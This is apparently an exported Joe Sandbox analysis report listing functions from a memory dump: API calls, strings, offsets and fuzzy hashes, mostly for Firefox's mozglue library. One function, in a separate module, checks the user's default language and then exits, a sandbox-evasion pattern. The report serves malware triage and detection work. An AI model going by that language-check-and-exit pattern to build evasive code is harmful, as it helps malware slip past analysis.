Opcode ID: 41c5850d8f2574063059fe1e5f38e86e03542bb051ddb164fde8f63fd6760835
Instruction ID: 3c709cdbf6361cd8845c36f5ed1707d72f6f6702420c1dadd25b0ff864ad800a
Opcode Fuzzy Hash: 41c5850d8f2574063059fe1e5f38e86e03542bb051ddb164fde8f63fd6760835
Instruction Fuzzy Hash: 5E3170B1A087048FDB00AF7DD68826EBBF1FF85345F01492DE99587211EB709449CB86

Function 6C6C9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C8273), ref: 6C6C9D65
free.MOZGLUE(6C6C8273,?), ref: 6C6C9D7C
free.MOZGLUE(?,?), ref: 6C6C9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6C9E0F
free.MOZGLUE(6C6C946B,?,?), ref: 6C6C9E24
free.MOZGLUE(?,?,?), ref: 6C6C9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6C9EC8
free.MOZGLUE(6C6C946B,?,?,?), ref: 6C6C9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6C9EF5

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: f4e41864c82b365101f029fc4d2347b1aeab8f286d35d697837c1767e57dc9bc
Instruction ID: 47cf202e046f2f6c6fcad783ce58ac714319064c696f4f7c110708e00fd83af6
Opcode Fuzzy Hash: f4e41864c82b365101f029fc4d2347b1aeab8f286d35d697837c1767e57dc9bc
Instruction Fuzzy Hash: 30719F70A09B418BC712CF18C48055BF3F4FF9A319B449619E85A9B711EB31F886CB8A

Function 6C6CDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6CDDCF

Part of subcall function 6C6AFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AFA4B

Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C90FF
Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDE0D
free.MOZGLUE(00000000), ref: 6C6CDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C6BDEFD,?,6C684A68), ref: 6C6CDF32

Part of subcall function 6C6CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6CDB86
Part of subcall function 6C6CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6CDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C6BDEFD,?,6C684A68), ref: 6C6CDF65
free.MOZGLUE(?), ref: 6C6CDF80

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: b2bca46aaa2b23a520223159d0eab3545a445d8044d05873497b6b606a07ab8c
Instruction ID: 6d0ccacd52e07a4dfdd48f7563f83b0d9ea49fb65ef158e1f03cd052458afeaf
Opcode Fuzzy Hash: b2bca46aaa2b23a520223159d0eab3545a445d8044d05873497b6b606a07ab8c
Instruction Fuzzy Hash: AC51A3727416019BD7219A29D8806EEB3B2FF96308F95011CD86A53B00DB31F91BCB9F

Function 6C6D5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5DC9
std::_Facet_Register.LIBCPMT ref: 6C6D5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5E45

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: aa4c68f561c3f345c4603a7b5151f331bbc1252b6b70978e62e0e94465c03b55
Instruction ID: b1ec9c848d94b7f71cba08e5d97ebe55e57868396172c5d450dd8ae9fa7b264e
Opcode Fuzzy Hash: aa4c68f561c3f345c4603a7b5151f331bbc1252b6b70978e62e0e94465c03b55
Instruction Fuzzy Hash: F8416E707002059FDB00EFA5D8D8AAE77F6FF89314F154069E51697B91EB30E805CB69

Function 6C6ACC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6731A7), ref: 6C6ACDDD

Strings

<jemalloc>, xrefs: 6C6ACF9F, 6C6ACFB3
: (malloc) Error in VirtualFree(), xrefs: 6C6ACFA4, 6C6ACFB8

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 52cf3b538e976a3327598f18226b1dbb035ea27016c4e4c7ecf1db3d4f8e3a48
Instruction ID: 9326e5b7ec01dba63c978be58e60674a9015e7defc28909d10e4058bf435295e
Opcode Fuzzy Hash: 52cf3b538e976a3327598f18226b1dbb035ea27016c4e4c7ecf1db3d4f8e3a48
Instruction Fuzzy Hash: A031C8707412056BFB00AFE98D45BAE7BB6BF85754F204014F522ABA80DB71D903CB9D

Function 6C67ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C67F100: LoadLibraryW.KERNEL32(shell32,?,6C6ED020), ref: 6C67F122
Part of subcall function 6C67F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C67F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C67ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C67EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C67EDCC
CreateFileW.KERNEL32 ref: 6C67EE08
free.MOZGLUE(00000000), ref: 6C67EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C67EE32

Part of subcall function 6C67EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C67EBB5
Part of subcall function 6C67EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C6AD7F3), ref: 6C67EBC3
Part of subcall function 6C67EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C6AD7F3), ref: 6C67EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C67EDC1

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: a1ece13c5dca2bad18ae7aeb64fa7c3016d1d66db6ccc7da674fac9c8d5d91ed
Instruction ID: 15c1150a4c6cf0a0477dac7b9c1eea9649bd7e9959e89c9914e12cce9c7e8515
Opcode Fuzzy Hash: a1ece13c5dca2bad18ae7aeb64fa7c3016d1d66db6ccc7da674fac9c8d5d91ed
Instruction Fuzzy Hash: 1851C071D052049FDB20DF68D9806EEB7B1AF5A318F048D2DE8556B740E730694DC7BA

Function 6C6EA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EA565

Part of subcall function 6C6EA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EA4BE
Part of subcall function 6C6EA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6EA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6EA6B6

Strings

0, xrefs: 6C6EA5FB
z, xrefs: 6C6EA6AE

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: dc0f949a60604fb757028f9bf955aeda172b40ad9f10a0a9444deadf109931ba
Instruction ID: 3929bc3d94abefc4140fe14aae5a9638c0eb6d9cd24bfcb292f9e00ea9191224
Opcode Fuzzy Hash: dc0f949a60604fb757028f9bf955aeda172b40ad9f10a0a9444deadf109931ba
Instruction Fuzzy Hash: CB4145719097459FC341CF28C080A9BBBF4BFCA344F408A2EF49987691EB30D649CB96

Function 6C6B9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
__Init_thread_footer.LIBCMT ref: 6C6B949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6B9459
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6B946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6B947D

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: dc48e73154d268757635c9044f6790d0e90ee258c5d7dc5c33bc0948c5cde651
Instruction ID: 07b182b5e4afa8086ebc153f9bf61c2f8978dac79f9d57a71c3fe89f3456b8eb
Opcode Fuzzy Hash: dc48e73154d268757635c9044f6790d0e90ee258c5d7dc5c33bc0948c5cde651
Instruction Fuzzy Hash: 0401F570A001018BD7109B5EE885A8972B79F0632CF040537D96AD6A52D632D86ACE5F

Function 00196210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00196214
ExitProcess.KERNEL32 ref: 00196245
ExitProcess.KERNEL32 ref: 0019624F
ExitProcess.KERNEL32 ref: 00196259
ExitProcess.KERNEL32 ref: 00196263
ExitProcess.KERNEL32 ref: 0019626D

Strings

*, xrefs: 0019622C

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: fa31853cd4fc3a424447cdc14e0979a9514e7597ece50002a78d3198b24a4922
Instruction ID: c3e3e2e4ea7b4c8436973a62f2768668fadd45ccbda81e4f148c8efd28dc138e
Opcode Fuzzy Hash: fa31853cd4fc3a424447cdc14e0979a9514e7597ece50002a78d3198b24a4922
Instruction Fuzzy Hash: 1AF0F831958208EFD745AFE0E909B5CBB79EB06703F108195F609C6190CB745A109B61

Function 6C6EB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6EB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6EB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6EB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6EB5F4
__Init_thread_footer.LIBCMT ref: 6C6EB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6EB61F
std::_Facet_Register.LIBCPMT ref: 6C6EB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6EB655

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3e88031275a852d068c8585365afcf28ce21800e449f588e6a5f7d6f06d02001
Instruction ID: 585f766e3c33a29d50fcc176319c6e47c5069a7b4a6e1e5e98de5d1b2ce720a8
Opcode Fuzzy Hash: 3e88031275a852d068c8585365afcf28ce21800e449f588e6a5f7d6f06d02001
Instruction Fuzzy Hash: AA317671B012058BCB009F5AD8955AEB7F6FFCA324F140516D51697740DB319806CFAE

Function 6C6AD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C67EB57,?,?,?,?,?,?,?,?,?), ref: 6C6AD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C67EB57,?), ref: 6C6AD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C67EB57,?), ref: 6C6AD673
free.MOZGLUE(?), ref: 6C6AD888

Strings

|Enabled, xrefs: 6C6AD81E
Wgl, xrefs: 6C6AD5D9, 6C6AD63F

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wgl$|Enabled
API String ID: 4142949111-1705841830
Opcode ID: 8895b6f3f7f8d82dee22133deb2cbd0d0e2a34d5cb21c19cffe399aaf78b7526
Instruction ID: abcaccc33ec9d53ed89f0115616f0c513573bf294f33fff4bea896b7a752711b
Opcode Fuzzy Hash: 8895b6f3f7f8d82dee22133deb2cbd0d0e2a34d5cb21c19cffe399aaf78b7526
Instruction Fuzzy Hash: 05A1F4B0A042049FDB14CFA9C4D07EEBBF1AF4A318F14805DD8956B781D731AD46CBA9

Function 6C6C1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6C1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6C1BE3,?,?,6C6C1D96,00000000), ref: 6C6C1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6C1BE3,?,?,6C6C1D96,00000000), ref: 6C6C1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6C1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6C1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6C1DDA

Part of subcall function 6C6C1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6C1F03
Part of subcall function 6C6C1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6C1DF2,00000000,00000000), ref: 6C6C1F0C
Part of subcall function 6C6C1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6C1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6C1DF4

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: fb8ae0c0e8ff074b35c116d1edfdef48cf9cc4f8d959297c1a9d3556843a01f1
Instruction ID: 87b6f7e6fb8b28c78e7420d25ee5798d46ffcc6e8b47c714924c4dade25a74c3
Opcode Fuzzy Hash: fb8ae0c0e8ff074b35c116d1edfdef48cf9cc4f8d959297c1a9d3556843a01f1
Instruction Fuzzy Hash: C34178B5200704AFCB10DF29D488A56BBF9FF89314F10446EE96A87B41CB31F814CB9A

Function 6C6B84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B85AC

Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B767F
Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B7693
Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B85B2

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 9956e4d29cc473ffc7fa1ed7d9751bc67390ca44a340ad85e89fddfdc68e6e42
